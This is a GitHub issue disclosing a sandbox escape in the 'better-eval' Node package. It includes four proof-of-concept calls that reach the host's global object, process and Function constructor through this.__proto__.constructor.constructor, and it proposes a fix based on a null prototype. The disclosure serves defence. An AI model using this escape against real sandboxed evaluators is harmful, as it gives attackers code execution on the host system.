
Exploit due to the use of the Node std vm module

Open FishingHacks opened this issue 2 years ago • 0 comments

Disclaimer: I might be understanding something wrong, but such a simple exploit should be avoided. In the README, it is claimed to be a safer alternative to eval.

BetterEval Version: 1.3.0
Node Version: 14.20.0
Operating System: Windows 10 & Linux
Type: Obtaining the global object of the main context

Exploit code:

const betterEval = require("better-eval")

// Each call walks from the sandbox's `this`, via its prototype, to the
// host realm's Function constructor and returns the host global object.
console.log(betterEval("this.__proto__.constructor.constructor('return this')().process"))
console.log(betterEval("this.__proto__.constructor.constructor('return this')()"))
console.log(betterEval("this.__proto__.constructor.constructor('return this')().eval"))
console.log(betterEval("this.__proto__.constructor.constructor('return this')().Function"))

Ideas on how to fix it:

  • set the proto of this to null

Implications of fix:

  • All functions inherited from Object can't be used on this
  • They can be obtained by using ({})[function]
  • ({}).__proto__.constructor.constructor is not a function and thus can't be exploited
  • (()=>{}).constructor(.constructor, ...) always lives in the cleared context and can't be exploited either.

Sorry for my bad English

FishingHacks, Aug 18 '22 22:08